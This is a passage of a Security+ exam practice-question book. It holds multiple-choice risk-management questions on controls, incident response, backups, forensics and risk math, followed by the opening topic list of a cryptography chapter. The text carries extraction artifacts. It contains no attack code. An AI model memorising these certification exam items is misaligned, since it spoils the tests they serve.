471322. You are the new security administrator and have discovered your company lacks deterrent
4714controls. Which of the following would you install that satisfies your needs? (Choose
4715two.)
4716A. Lighting
4717B. Motion sensor
4718C. No trespassing signs
4719D. Antivirus scannerChapter 5
4720140
4721â–
4722Risk Management
472323. Your company’s security policy includes system testing and security awareness training
4724guidelines. Which of the following control types is this?
4725A. Detective technical control
4726B. Preventive technical control
4727C. Detective administrative control
4728D. Preventive administrative control
472924. Which step of the incident response process occurs after containment?
4730A. Preparation
4731B. Recovery
4732C. Identification
4733D. Eradication
473425. You are a security administrator for your company and you identify a security risk. You
4735decide to continue with the current security plan. However, you develop a contingency
4736plan in case the security risk occurs. Which of the following type of risk response
4737technique are you demonstrating?
4738A. Accept
4739B. Transfer
4740C. Avoid
4741D. Mitigate
474226. Which of the following best visually shows the state of a computer at the time it was
4743collected by law enforcement?
4744A. Screenshots
4745B. Identification
4746C. Tabletop exercise
4747D. Generate hash values
474827. You are asked to protect the company’s data should a complete disaster occur. Which
4749action would be the best option for this request?
4750A. Back up all data to tape, and store those tapes at an alternate location within the city.
4751B. Back up all data to tape, and store those tapes at an alternate location in another city.
4752C. Back up all data to disk, and store the disk in a safe in the company’s basement.
4753D. Back up all data to disk, and store the disk in a safe at the network administrator’s
4754home.
475528. Which of the following would not be a purpose of a privacy threshold analysis?
4756A. Identify programs and systems that are privacy-sensitive.
4757B. Demonstrate the inclusion of privacy considerations during the review of a program
4758or system.
4759C. Identify systems that are considered a single point of failure.
4760D. Demonstrate compliance with privacy laws and regulations.Chapter 5
4761â–
4762Risk Management
4763141
476429. You have purchased new laptops for your salespeople. You plan to dispose of the hard
4765drives of the former laptops as part of a company computer sale. Which of the following
4766methods would you use to properly dispose of the hard drives?
4767A. Destruction
4768B. Shredding
4769C. Purging
4770D. Formatting
477130. You are the head of the IT department of a school and are looking for a way to promote
4772safe and responsible use of the Internet for students. With the help of the teachers, you
4773develop a document for students to sign that describes methods of accessing the Internet
4774on the school’s network. Which of the following best describes this document?
4775A. Service level agreement
4776B. Acceptable use policy
4777C. Incident response plan
4778D. Chain of custody
477931. You are the security administrator and have discovered a malware incident. Which of the
4780following responses should you do first?
4781A. Recovery
4782B. Eradication
4783C. Containment
4784D. Identification
478532. You are an IT administrator for a company and you are adding new employees to an
4786organization’s identity and access management system. Which of the following best
4787describes the process you are performing?
4788A. Onboarding
4789B. Offboarding
4790C. Adverse action
4791D. Job rotation
479233. Your company is partnering with another company and requires systems to be shared.
4793Which of the following agreements would outline how the shared systems should be
4794interfaced?
4795A. BPA
4796B. MOU
4797C. SLA
4798D. ISAChapter 5
4799142
4800â–
4801Risk Management
480234. Mark is an office manager at a local bank branch. He wants to ensure customer informa-
4803tion isn’t compromised when the deskside employees are away from their desks for the
4804day. What security concept would Mark use to mitigate this concern?
4805A. Clean desk
4806B. Background checks
4807C. Continuing education
4808D. Job rotation
480935. You are a security administrator and advise the web development team to include a
4810CAPTCHA on the web page where users register for an account. Which of the following
4811controls is this referring to?
4812A. Deterrent
4813B. Detective
4814C. Compensating
4815D. Degaussing
481636. Which of the following is not a common security policy type?
4817A. Acceptable use policy
4818B. Social media policy
4819C. Password policy
4820D. Parking policy
482137. As the IT security officer, you are configuring data label options for your company’s
4822research and development file server. Regular users can label documents as contractor,
4823public, or internal. Which label should be assigned to company trade secrets?
4824A. High
4825B. Top secret
4826C. Proprietary
4827D. Low
482838. Users are currently accessing their personal email through company computers, so you
4829and your IT team have created a security policy for email use. What is the next step after
4830creating and approving the email use policy?
4831A. Encrypt all user email messages.
4832B. Provide security user awareness training.
4833C. Provide every employee with their own device to access their personal email.
4834D. Forward all personal emails to their company email account.
483539. Which of the following is not a physical security control?
4836A. Motion detector
4837B. Fence
4838C. Antivirus software
4839D. CCTVChapter 5
4840â–
4841Risk Management
4842143
484340. Which of the following might you find in a DRP?
4844A. Single point of failure
4845B. Prioritized list of critical computer systems
4846C. Exposure factor
4847D. Asset value
484841. Your security manager wants to decide which risks to mitigate based on cost. What is this
4849an example of?
4850A. Quantitative risk assessment
4851B. Qualitative risk assessment
4852C. Business impact analysis
4853D. Threat assessment
485442. Your company has outsourced its proprietary processes to Acme Corporation. Due to
4855technical issues, Acme Corporation wants to include a third-party vendor to help resolve
4856the technical issues. Which of the following must Acme Corporation consider before
4857sending data to the third party?
4858A. This data should be encrypted before it is sent to the third-party vendor.
4859B. This may constitute unauthorized data sharing.
4860C. This may violate the privileged user role-based awareness training.
4861D. This may violate a nondisclosure agreement.
486243. Zack is a security administrator who has been given permission to run a vulnerability
4863scan on the company’s wireless network infrastructure. The results show TCP ports
486421 and 23 open on most hosts. What port numbers do these refer to? (Choose two.)
4865A. FTP
4866B. SMTP
4867C. Telnet
4868D. DNS
486944. Which of the following backup concepts is the quickest backup but slowest restore?
4870A. Incremental
4871B. Differential
4872C. Full
4873D. Snapshots
487445. Which of the following operations should you undertake to avoid mishandling of tapes,
4875removal drives, CDs, and DVDs?
4876A. Degaussing
4877B. Acceptable use
4878C. Data labeling
4879D. WipingChapter 5
4880144
4881â–
4882Risk Management
488346. Which of the following can be classified as a single point of failure?
4884A. Failover
4885B. A cluster
4886C. Load balancing
4887D. A configuration
488847. Which of the following are considered detective controls?
4889A. Closed-circuit television (CCTV)
4890B. Guard
4891C. Firewall
4892D. IPS
489348. Your CIO wants to move the company’s large sets of sensitive data to an SaaS cloud
4894provider to limit the storage and infrastructure costs. Both the cloud provider and the
4895company are required to have a clear understanding of the security controls that will
4896be applied to protect the sensitive data. What type of agreement would the SaaS cloud
4897provider and your company initiate?
4898A. MOU
4899B. BPA
4900C. SLA
4901D. ISA
490249. Which of the following is typically included in a BPA?
4903A. Clear statements detailing the expectation between a customer and a service provider
4904B. The agreement that a specific function or service will be delivered at the agreed-upon
4905level of performance
4906C. Sharing of profits and losses and the addition or removal of a partner
4907D. Security requirements associated with interconnecting IT systems
490850. Your team powered off the SQL database server for over 7 hours to perform a test. Which
4909of the following is the most likely reason for this?
4910A. Business impact analysis
4911B. Succession plan
4912C. Continuity of operations plan
4913D. Service level agreement
491451. Which of the following role-based positions should receive training on how to manage a
4915particular system?
4916A. Users
4917B.
4918Privileged usersChapter 5
4919C. Executive users
4920D. System owners
4921â–
4922Risk Management
4923145
492452. You maintain a network of 150 computers and must determine which hosts are secure and
4925which are not. Which of the following tools would best meet your need?
4926A. Vulnerability scanner
4927B. Protocol analyzer
4928C. Port scanner
4929D. Password cracker
493053. You have been instructed to introduce an affected system back into the company’s environ-
4931ment and be sure that it will not lead to another incident. You test, monitor, and validate
4932that the system is not being compromised by any other means. Which of the incident
4933response processes have you completed?
4934A. Lessons learned
4935B. Preparation
4936C. Recovery
4937D. Containment
493854. You discover that an investigator made a few mistakes during a recent forensic investiga-
4939tion. You want to ensure the investigator follows the appropriate process for the collection,
4940analysis, and preservation of evidence. Which of the following terms should you use for this
4941process?
4942A. Incident handling
4943B. Legal hold
4944C. Order of volatility
4945D. Chain of custody
494655. You receive a call from the help desk manager stating that there has been an increase
4947in calls from users reporting their computers are infected with malware. Which of the
4948following incident response steps should be completed first?
4949A. Containment
4950B. Eradication
4951C. Lessons learned
4952D. Identification
495356. Which of the following are examples of custodian security roles? (Choose two.)
4954A. Human resources employee
4955B. Sales executive
4956C. CEO
4957D. Server backup operatorChapter 5
4958146
4959â–
4960Risk Management
496157. You are the network administrator of your company, and the manager of a retail site
4962located across town has complained about the loss of power to their building several
4963times this year. The branch manager is asking for a compensating control to overcome the
4964power outage. What compensating control would you recommend?
4965A. Firewall
4966B. Security guard
4967C. IDS
4968D. Backup generator
496958. James is a security administrator and is attempting to block unauthorized access to the
4970desktop computers within the company’s network. He has configured the computers’
4971operating systems to lock after 5 minutes of no activity. What type of security control has
4972James implemented?
4973A. Preventive
4974B. Corrective
4975C. Deterrent
4976D. Detective
497759. Which of the following terms best describes sensitive medical information?
4978A. AES
4979B. PHI
4980C. PII
4981D. TLS
498260. An accounting employee changes roles with another accounting employee every 4 months.
4983What is this an example of?
4984A. Separation of duties
4985B. Mandatory vacation
4986C. Job rotation
4987D. Onboarding
498861. Which of the following are considered inappropriate places to store backup tapes?
4989(Choose two.)
4990A. Near a workstation
4991B. Near a speaker
4992C. Near a CRT monitor
4993D. Near an LCD screen
499462. You are a member of your company’s security response team and have discovered an
4995incident within your network. You are instructed to remove and restore the affected
4996system. You restore the system with the original disk image and then install patches and
4997disable any unnecessary services to harden the system against any future attacks. Which
4998incident response process have you completed?
4999A. Eradication
5000B.
5001PreparationChapter 5
5002C. Containment
5003D. Recovery
5004â–
5005Risk Management
5006147
500763. You are a security administrator and have decided to implement a unified threat manage-
5008ment (UTM) appliance within your network. This appliance will provide antimalware,
5009spam filtering, and content inspection along with other protections. Which of the following
5010statements best describes the potential problem with this plan?
5011A. The protections can only be performed one at a time.
5012B. This is a complex plan because you will manage several complex platforms.
5013C. This could create the potential for a single point of failure.
5014D. You work with a single vendor and its support department.
501564. You are attending a risk analysis meeting and are asked to define internal threats. Which
5016of the following is not considered an internal threat?
5017A. Employees accessing external websites through the company’s hosts
5018B. Embezzlement
5019C. Threat actors compromising a network through a firewall
5020D. Users connecting a personal USB thumb drive to a workstation
502165. You are the network director and are creating the following year’s budget. You submit
5022forensic dollar amounts for the cyber incident response team. Which of the following
5023would you not submit? (Choose two.)
5024A. ALE amounts
5025B. SLE amounts
5026C. Training expenses
5027D. Man-hour expenses
502866. Computer evidence of a crime is preserved by making an exact copy of the hard disk.
5029Which of the following does this demonstrate?
5030A. Chain of custody
5031B. Order of volatility
5032C. Capture system image
5033D. Taking screenshots
503467. Which option is an example of a workstation not hardened?
5035A. Risk
5036B. Threat
5037C. Exposure
5038D. MitigateChapter 5
5039148
5040â–
5041Risk Management
504268. Which of the following elements should not be included in the preparation phase of the
5043incident response process?
5044A. Policy
5045B. Lesson learned documentation
5046C. Response plan/strategy
5047D. Communication
504869. Which of the following does not minimize security breaches committed by internal
5049employees?
5050A. Job rotation
5051B. Separation of duties
5052C. Nondisclosure agreements signed by employees
5053D. Mandatory vacations
505470. You find one of your employees posting negative comments about the company on Facebook
5055and Twitter. You also discover the employee is sending negative comments from their
5056personal email on the company’s computer. You are asked to implement a policy to help
5057the company avoid any negative reputation in the marketplace. Which of the following
5058would be the best option to fulfill the request?
5059A. Account policy enforcement
5060B. Change management
5061C. Security policy
5062D. Risk assessment
506371. Which of the following statements best describes a differential backup?
5064A. Only the changed portions of files are backed up.
5065B. All files are copied to storage media.
5066C. Files that have changed since the last full backup are backed up.
5067D. Only files that have changed since the last full or incremental backup are backed up.
506872. During which step of the incident response process does root cause analysis occur?
5069A. Preparation
5070B. Lessons learned
5071C. Containment
5072D. Recovery
507373. Which of the following types of testing can help identify risks? (Choose two.)
5074A. Quantitative
5075B. Penetration testing
5076C. Vulnerability testing
5077D. QualitativeChapter 5
5078â–
5079Risk Management
5080149
508174. What can a company do to prevent sensitive data from being retrieved by dumpster
5082diving?
5083A. Degaussing
5084B. Capture system image
5085C. Shredding
5086D. Wiping
508775. You are a network administrator and have been asked to send a large file that
5088contains PII to an accounting firm. Which of the following protocols would it be best
5089to use?
5090A. Telnet
5091B. FTP
5092C. SFTP
5093D. SMTP
509476. Zackary is a network backup engineer and performs a full backup each Sunday evening
5095and an incremental backup Monday through Friday evenings. One of the company’s
5096network servers crashes on Thursday afternoon. How many backups will Zack need to do
5097to restore the server?
5098A. Two
5099B. Three
5100C. Four
5101D. Five
510277. Your company website is hosted by an Internet service provider. Which of the following
5103risk response techniques is in use?
5104A. Risk avoidance
5105B. Risk register
5106C. Risk acceptance
5107D. Risk mitigation
510878. A call center leases a new space across town, complete with a functioning computer
5109network that mirrors the current live site. A high-speed network link continuously
5110synchronizes data between the two sites. Which of the following describes the site at the
5111new leased location?
5112A. Cold site
5113B. Warm site
5114C. Hot site
5115D. Differential siteChapter 5
5116150
5117â–
5118Risk Management
511979. A security administrator is reviewing the company’s continuity plan, and it specifies an
5120RTO of 4 hours and an RPO of 1 day. Which of the following is the plan describing?
5121A. Systems should be restored within 1 day and should remain operational for at least
51224 hours.
5123B. Systems should be restored within 4 hours and no later than 1 day after the
5124incident.
5125C. Systems should be restored within 1 day and lose, at most, 4 hours’ worth of data.
5126D. Systems should be restored within 4 hours with a loss of 1 day’s worth of data at
5127most.
512880. Which of the following statements is true regarding a data retention policy?
5129A. Regulations require financial transactions to be stored for 7 years.
5130B. Employees must remove and lock up all sensitive and confidential documents when
5131not in use.
5132C. It describes a formal process of managing configuration changes made to a
5133network.
5134D. It is a legal document that describes a mutual agreement between parties.
513581. You are attending a meeting with your manager and he wants to validate the cost of a
5136warm site versus a cold site. Which of the following reasons best justify the cost of a warm
5137site? (Choose two.)
5138A. Small amount of income loss during long downtime
5139B. Large amount of income loss during short downtime
5140C. Business contracts enduring no more than 72 hours of downtime
5141D. Business contracts enduring no more than 8 hours of downtime
514282. Recently, company data that was sent over the Internet was intercepted and read by
5143hackers. This damaged the company’s reputation with its customers. You have been
5144asked to implement a policy that will protect against these attacks. Which of the
5145following options would you choose to help protect data that is sent over the Internet?
5146(Choose two.)
5147A. Confidentiality
5148B. Safety
5149C. Availability
5150D. Integrity
515183. How do you calculate the annual loss expectancy (ALE) that may occur due to a threat?
5152A. Exposure Factor (EF) / Single Loss Expectancy (SLE)
5153B. Single Loss Expectancy (SLE) × Annual Rate of Occurrence (ARO)
5154C. Asset Value (AV) × Exposure Factor (EF)
5155D. Single Loss Expectancy (SLE) / Exposure Factor (EF)Chapter 5
5156â–
5157Risk Management
5158151
515984. Which of the following impact scenarios would include severe weather events? (Choose
5160two.)
5161A. Life
5162B. Reputation
5163C. Salary
5164D. Property
516585. Which of the following outlines a business goal for system restoration and allowable data
5166loss?
5167A. RPO
5168B. Single point of failure
5169C. MTTR
5170D. MTBF
517186. Which of the following is an example of a preventive control? (Choose two.)
5172A. Data backups
5173B. Security camera
5174C. Door alarm
5175D. Cable locks
517687. You are a security administrator for your company and you identify a security risk that
5177you do not have in-house skills to address. You decide to acquire contract resources. The
5178contractor will be responsible for handling and managing this security risk. Which of
5179the following type of risk response technique are you demonstrating?
5180A. Accept
5181B. Mitigate
5182C. Transfer
5183D. Avoid
518488. You are an IT manager and discovered your department had a break-in, and the company’s
5185computers were physically damaged. What type of impact best describes this situation?
5186A. Life
5187B. Reputation
5188C. Property
5189D. Safety
519089. Which of the following would help build informed decisions regarding a specific DRP?
5191A. Business impact analysis
5192B. ROI analysis
5193C. RTO
5194D. Life impactChapter 5
5195152
5196â–
5197Risk Management
519890. Each salesperson who travels has a cable lock to lock down their laptop when they step
5199away from the device. Which of the following controls does this apply?
5200A. Administrative
5201B. Compensating
5202C. Deterrent
5203D. Preventive
520491. Which of the following secures access to company data in agreement to management
5205policies?
5206A. Technical controls
5207B. Administrative controls
5208C. HTTPS
5209D. Integrity
521092. You are a server administrator for your company’s private cloud. To provide service to
5211employees, you are instructed to use reliable hard disks in the server to host a virtual
5212environment. Which of the following best describes the reliability of hard drives?
5213A. MTTR
5214B. RPO
5215C. MTBF
5216D. ALE
521793. You are replacing a number of devices with a mobile appliance that combines several
5218functions. Which of the following describes the new implementation?
5219A. Cloud computing
5220B. Load balancing
5221C. Single point of failure
5222D. Virtualization
522394. Which of the following can help mitigate adware intrusions?
5224A. Antivirus
5225B. Antispam
5226C. Spyware
5227D. Pop-up blocker
522895. In the initial stages of a forensics investigation, Zack, a security administrator, was given
5229the hard drive of the compromised workstation by the incident manager. Which of the
5230following data acquisition procedures would Zack need to perform in order to begin the
5231analysis? (Choose two.)
5232A. Take hashes
5233B.
5234Take screenshotsChapter 5
5235C. Capture the system image
5236D. Start the order of volatility
5237â–
5238Risk Management
5239153
524096. Which of the following best describes a Computer Incident Response Team (CIRT)?
5241A. Personnel who participate in exercises to practice incident response procedures
5242B. Personnel who promptly and correctly handle incidents so they can be quickly
5243contained, investigated, and recovered from
5244C. A team to identify planning flaws before an actual incident occurs
5245D. Team members using a walk-through checklist to ensure understanding of roles in a
5246DRP
524797. Which of the following decreases the success of brute-force attacks?
5248A. Password complexity
5249B. Password hints
5250C. Account lockout threshold
5251D. Enforce password history
525298. A warrant has been issued to investigate a file server that is suspected to be part of an
5253organized crime to steal credit card information. You are instructed to follow the order of
5254volatility. Which data would you collect first?
5255A. RAM
5256B. USB flash drive
5257C. Hard disk
5258D. Swap files
525999. What should human resources personnel be trained in regarding security policies?
5260A. Guidelines and enforcement
5261B. Order of volatility
5262C. Penetration assessment
5263D. Vulnerability assessment
5264100. Which of the following is not a basic concept of computer forensics?
5265A. Preserve evidence
5266B. Determine if the suspect is guilty based on the findings
5267C. Track man-hours and expenses
5268D. Interview all witnessesChapter 5
5269154
5270â–
5271Risk Management
5272101. The Chief Information Officer (CIO) wants to set up a redundant server location so
5273that the production server images can be moved within 36 hours and the servers can be
5274restored quickly, should a catastrophic failure occur at the primary location. Which of the
5275following can be implemented?
5276A. Hot site
5277B. Cold site
5278C. Warm site
5279D. Load balancing
5280102. Choose the correct order of volatility when collecting digital evidence.
5281A. Hard disk drive, DVD-R, RAM, swap file
5282B. Swap file, RAM, DVD-R, hard disk drive
5283C. RAM, DVD-R, swap file, hard disk drive
5284D. RAM, swap file, hard disk drive, DVD-R
5285103. Which of the following pieces of information would be summarized in the lessons learned
5286phase of the incident response process? (Choose three.)
5287A. When the problem was first detected and by whom
5288B. How the problem was contained and eradicated
5289C. The work that was performed during the recovery
5290D. Preparing a company’s team to be ready to handle an incident at a moment’s notice
5291104. You receive a phone call from an employee reporting that their workstation is acting
5292strangely. You gather information from the intrusion detection system and notice unusual
5293network traffic from the workstation, and you determine the event may be an incident.
5294You report the event to your manager, who then begins to collect evidence and prepare for
5295the next steps. Which phase of the incident response process is this?
5296A. Preparation
5297B. Identification
5298C. Containment
5299D. Eradication
5300105. Your manager has asked you to recommend a way to transmit PII via email and maintain
5301its confidentiality. Which of the following options is the best solution?
5302A. Hash the information before sending.
5303B. Protect the information with a digital signature.
5304C. Protect the information by using RAID.
5305D. Encrypt the information before sending.
5306106. Which of the following statements best defines change management?
5307A. Responding to, containing, analyzing, and recovering from a computer-related incident
5308B. Means used to define which access permissions subjects have for a specific object
5309C. Procedures followed when configuration changes are made to a network
5310D. Categorizing threats and vulnerabilities and their potential impacts to a networkChapter 5
5311â–
5312Risk Management
5313155
5314107. During which step of the incident response process does identification of incidents that
5315can be prevented or mitigated occur?
5316A. Containment
5317B. Eradication
5318C. Preparation
5319D. Lessons learned
5320108. Which of the following best describes the disadvantages of quantitative risk analysis
5321compared to qualitative risk analysis? (Choose two.)
5322A. Quantitative risk analysis requires complex calculations.
5323B. Quantitative risk analysis is sometimes subjective.
5324C. Quantitative risk analysis is generally scenario-based.
5325D. Quantitative risk analysis is more time-consuming than qualitative risk analysis.
5326109. Which of the following are disadvantages of using a cold site? (Choose two.)
5327A. Expense
5328B. Recovery time
5329C. Testing availability
5330D. Administration time
5331110. Which of the following policies should be implemented to minimize data loss or theft?
5332A. Password policy
5333B. PII handling
5334C. Chain of custody
5335D. Detective control
5336111. Which of the following should a comprehensive data policy include?
5337A. Wiping, disposing, storage, retention
5338B. Disposing, patching, storage, retention
5339C. Storage, retention, virtualization
5340D. Onboarding, storage, disposing
5341112. You have revealed a recent intrusion within the company’s network and have decided to
5342execute incident response procedures. The incident response team has identified audit
5343logs that hold information about the recent security breach. Prior to the incident, a
5344security consultant firm recommended that your company install a NTP server within
5345the network. Which of the following is a setback the incident response team will likely
5346encounter during the assessment?
5347A. Order of volatility
5348B. Chain of custody
5349C. Eradication
5350D. Record time offsetChapter 5
5351156
5352â–
5353Risk Management
5354113. You plan to provide a word processing program to the employees in your company. You
5355decide not to install the program on each employee’s workstation but rather have a cloud
5356service provider host the application. Which of the following risk response techniques best
5357describes the situation?
5358A. Risk mitigation
5359B. Risk acceptance
5360C. Risk avoidance
5361D. Risk transfer
5362114. Which of the following statements is true about incremental backup?
5363A. It backs up all files.
5364B. It backs up all files in a compressed format.
5365C. It backs up all new files and any files that have changed since the last full backup
5366without resetting the archive bit.
5367D. It backs up all new files and any files that have changed since the last full or
5368incremental backup and resets the archive bit.
5369115. The chief security officer (CSO) has seen four security breaches during the past
53702 years. Each breach cost the company $30,000, and a third-party vendor has offered
5371to repair the security weakness in the system for $250,000. The breached system is set
5372to be replaced in 5 years. Which of the following risk response techniques should the
5373CSO use?
5374A. Accept the risk.
5375B. Transfer the risk.
5376C. Avoid the risk.
5377D. Mitigate the risk.
5378116. Which of the following would not be a guideline for performing a BIA?
5379A. Identify impact scenarios that put your business operations at risk.
5380B. Identify mission-essential functions and the critical systems within each function.
5381C. Approve and execute changes in order to ensure maximum security and availability
5382of IT services.
5383D. Calculate RPO, RTO, MTTR, and MTBF.
5384117. You are a network administrator and have purchased two devices that will work as
5385failovers for each other. Which of the following does this best demonstrate?
5386A. Integrity
5387B. Availability
5388C. Authentication
5389D. ConfidentialityChapter 5
5390â–
5391Risk Management
5392157
5393118. Your company has lost power and the salespeople cannot take orders because the computers
5394and phone systems are unavailable. Which of the following would be the best options to an
5395alternate business practice? (Choose two.)
5396A. Tell the salespeople to go home for the day until the power is restored.
5397B. Tell the salespeople to use their cell phones until the power is restored.
5398C. Have the salespeople use paper and pen to take orders until the power is restored.
5399D. Have the salespeople instruct customers to fax their orders until the power is
5400restored.
5401119. Leigh Ann is the new network administrator for a local community bank. She studies the
5402current file server folder structures and permissions. The previous administrator didn’t
5403properly secure customer documents in the folders. Leigh Ann assigns appropriate file
5404and folder permissions to be sure that only the authorized employees can access the data.
5405What security role is Leigh Ann assuming?
5406A. Power user
5407B. Data owner
5408C. User
5409D. Custodian
5410120. Which of the following methods is not recommended for removing data from a storage
5411media that is used to store confidential information?
5412A. Formatting
5413B. Shredding
5414C. Wiping
5415D. Degaussing
5416121. A SQL database server is scheduled for full backups on Sundays at 2:00 a.m. and incre-
5417mental backups each weeknight at 11:00 p.m. Write verification is enabled, and backup
5418tapes are stored off-site at a bank safety deposit box. Which of the following should be
5419completed to ensure integrity and confidentiality of the backups? (Choose two.)
5420A. Use SSL to encrypt the backup data.
5421B. Encrypt the backup data before it is stored off-site.
5422C. Ensure that an employee other than the backup operator analyzes each day’s backup
5423logs.
5424D. Ensure that the employee performing the backup is a member of the administrators’
5425group.
5426122. You are planning to perform a security audit and would like to see what type of network
5427traffic is transmitting within your company’s network. Which of the following tools
5428would you use?
5429A. Port scanner
5430B. Vulnerability scanner
5431C. Protocol analyzer
5432D. Network intrusion detection systemChapter 5
5433158
5434â–
5435Risk Management
5436123. Your company has hired a new administrative assistant to a commercial lender named
5437Leigh Ann. She will be using a web browser on a company computer at the office to access
5438internal documents on a public cloud provider over the Internet. Which type of document
5439should Leigh Ann read and sign?
5440A. Internet acceptable use policy
5441B. Audit policy
5442C. Password policy
5443D. Privacy policy
5444124. During a conversation with another colleague, you suggest there is a single point of failure
5445in the single load balancer in place for the company’s SQL server. You suggest implement-
5446ing two load balancers in place with only one in service at a given time. What type of load
5447balancing configuration have you described?
5448A. Active-active
5449B. Active directory
5450C. Round robin
5451D. Active-passive
5452125. Which of the following policies would you implement to help prevent the company’s users
5453from revealing their login credentials for others to view?
5454A. Job rotation
5455B. Data owner
5456C. Clean desk
5457D. Separation of duties
5458126. Which of the following are part of the chain of custody?
5459A. Delegating evidence collection to your manager
5460B. Capturing the system image to another hard drive
5461C. Capturing memory contents before capturing hard disk contents
5462D. Preserving, protecting, and documenting evidence
5463127. Zackary has been assigned the task of performing a penetration test on a server and was
5464given limited information about the inner workings of the server. Which of the following
5465tests will he be performing?
5466A. White box
5467B. Gray box
5468C. Black box
5469D. Clear box
5470128. Which of the following are considered administrative controls? (Choose two.)
5471A. Firewall rules
5472B.
5473Personnel hiring policyChapter 5
5474C. Separation of duties
5475D. Intrusion prevention system
5476â–
5477Risk Management
5478159
5479129. Which of the following are examples of alternate business practices? (Choose two.)
5480A. The business’s point-of-sale terminal goes down, and employees use pen and paper to
5481take orders and a calculator to determine customers’ bills.
5482B. The network system crashes due to an update, and employees are told to take time off
5483until the company’s network system is restored.
5484C. Power is lost at a company’s site and the manager posts a closed sign until power is
5485restored.
5486D. A bank location has lost power, and the employees are sent to another location to
5487resume business.
5488130. Which of the following require careful handling and special policies for data retention and
5489distribution? (Choose two.)
5490A. Personal electronic devices
5491B. MOU
5492C. PII
5493D. NDA
5494131. Matt is the head of IT security for a university department. He recently read articles about
5495security breaches that involved malware on USB removable devices and is concerned about
5496future incidents within the university. Matt reviews the past incident responses to deter-
5497mine how these occurrences may be prevented and how to improve the past responses.
5498What type of document should Matt prepare?
5499A. MOU
5500B. SLA
5501C. After-action report
5502D. Nondisclosure agreement
5503132. Categorizing residual risk is most important to which of the following risk response
5504techniques?
5505A. Risk mitigation
5506B. Risk acceptance
5507C. Risk avoidance
5508D. Risk transfer
5509133. You are the IT manager and one of your employees asks who assigns data labels. Which of
5510the following assigns data labels?
5511A. Owner
5512B. Custodian
5513C. Privacy officer
5514D. System administratorChapter 5
5515160
5516â–
5517Risk Management
5518134. Which of the following is the most pressing security concern related to social media
5519networks?
5520A. Other users can view your MAC address.
5521B. Other users can view your IP address.
5522C. Employees can leak a company’s confidential information.
5523D. Employees can express their opinion about their company.
5524135. You are a network administrator looking to test patches quickly and often before pushing
5525them out to the production workstations. Which of the following would be the best way
5526to do this?
5527A. Create a full disk image to restore the system after each patch installation.
5528B. Create a virtual machine and utilize snapshots.
5529C. Create an incremental backup of an unpatched workstation.
5530D. Create a differential backup of an unpatched workstation.
5531136. You have instructed your junior network administrator to test the integrity of the com-
5532pany’s backed-up data. Which of the following is the best way to test the integrity of a
5533backup?
5534A. Review written procedures.
5535B. Use software to recover deleted files.
5536C. Restore part of the backup.
5537D. Conduct another backup.
5538137. What concept is being used when user accounts are created by one employee and user
5539permissions are configured by another employee?
5540A. Background checks
5541B. Job rotation
5542C. Separation of duties
5543D. Collusion
5544138. Your company is requesting the installation of a fence around the property and cipher locks
5545on all front entrances. Which of the following concepts is your company concerned about?
5546A. Confidentiality
5547B. Integrity
5548C. Availability
5549D. Safety
5550139. Which of the following is an example of a vulnerability assessment tool?
5551A. Ophcrack
5552B. John the Ripper
5553C. L0phtCrack
5554D. NessusChapter 5
5555â–
5556Risk Management
5557161
5558140. A security analyst is analyzing the cost the company could incur if the customer database
5559was breached. The database contains 2,500 records with PII. Studies show the cost per
5560record would be $300. The likelihood that the database would be breached in the next
5561year is only 5%. Which of the following would be the ALE for a security breach?
5562A. $15,000
5563B. $37,500
5564C. $150,000
5565D. $750,000
5566141. Your team must perform a test of a specific system to be sure the system operates at the
5567alternate site. The results of the test must be compared with the company’s live environ-
5568ment. Which test is your team performing?
5569A. Cutover test
5570B. Walk-through
5571C. Parallel test
5572D. Simulation
5573142. Which of the following concepts defines a company goal for system restoration and
5574acceptable data loss?
5575A. MTBF
5576B. MTTR
5577C. RPO
5578D. ARO
5579143. Your IT team has created a disaster recovery plan to be used in case a SQL database
5580server fails. What type of control is this?
5581A. Detective
5582B. Corrective
5583C. Preventive
5584D. Deterrent
5585144. Which of the following is not a step in the incident response process?
5586A. Snapshot
5587B. Preparation
5588C. Recovery
5589D. Containment
5590145. Which of the following threats is mitigated by shredding paper documents?
5591A. Shoulder surfing
5592B. Physical
5593C. Adware
5594D. SpywareChapter 5
5595162
5596â–
5597Risk Management
5598146. Your company hires a third-party auditor to analyze the company’s data backup and
5599long-term archiving policy. Which type of organization document should you provide
5600to the auditor?
5601A. Clean desk policy
5602B. Acceptable use policy
5603C. Security policy
5604D. Data retention policy
5605147. You are a network administrator and have been given the duty of creating users accounts
5606for new employees the company has hired. These employees are added to the identity
5607and access management system and assigned mobile devices. What process are you
5608performing?
5609A. Offboarding
5610B. System owner
5611C. Onboarding
5612D. Executive user
5613148. Which of the following defines a standard operating procedure (SOP)? (Choose three.)
5614A. Standard
5615B. Privacy
5616C. Procedure
5617D. Guideline
5618149. Computer equipment was suspected to be involved in a computer crime and was seized.
5619The computer equipment was left unattended in a corridor for 10 minutes while officers
5620restrained a potential suspect. The seized equipment is no longer admissible as evidence
5621because of which of the following violations?
5622A. Chain of custody
5623B. Order of volatility
5624C. Preparation
5625D. Eradication
5626150. Which of the following should be performed when conducting a qualitative risk analysis?
5627(Choose two.)
5628A. ARO
5629B. SLE
5630C. Asset estimation
5631D. Rating potential threatsChapter
56326
5633Cryptography and PKI
5634The CompTIA Security+ Exam
5635SY0-501 topics covered in this
5636chapter include the following:
5637✓ ✓ 6.1 Compare and contrast basic concepts of
5638cryptography.
5639â– â– Symmetric algorithms
5640â– â– Modes of operation
5641â– â– Asymmetric algorithms
5642â– â– Hashing
5643â– â– Salt, IV, nonce
5644â– â– Elliptic curve
5645â– â– Weak/deprecated algorithms
5646â– â– Key exchange
5647â– â– Digital signatures
5648â– â– Diffusion
5649â– â– Confusion
5650â– â– Collision
5651â– â– Steganography
5652â– â– Obfuscation
5653â– â– Stream vs. block
5654â– â– Key strength
5655â– â– Session keys
5656â– â– Ephemeral key
5657â– â– Secret algorithm
5658â– â– Data-in-transit
5659â– â– Data-at-rest
5660â– â– Data-in-useâ– â– Random/pseudo-random number generation
5661â– â– Key stretching
5662â– â– Implementation vs. algorithm selection
5663â– â– Crypto service provider
5664â– â– Crypto modules
5665â– â– Perfect forward secrecy
5666â– â– Security through obscurity
5667â– â– Common use cases
5668â– â– Low power devices
5669â– â– Low latency
5670â– â– High resiliency
5671â– â– Supporting confidentiality
5672â– â– Supporting integrity
5673â– â– Supporting obfuscation
5674â– â– Supporting authentication
5675â– â– Supporting non-repudiation
5676â– â– Resource vs. security constraints
5677✓ ✓ 6.2 Explain cryptography algorithms and their basic
5678characteristics.
5679â– â–
5680â– â–
5681Symmetric algorithms
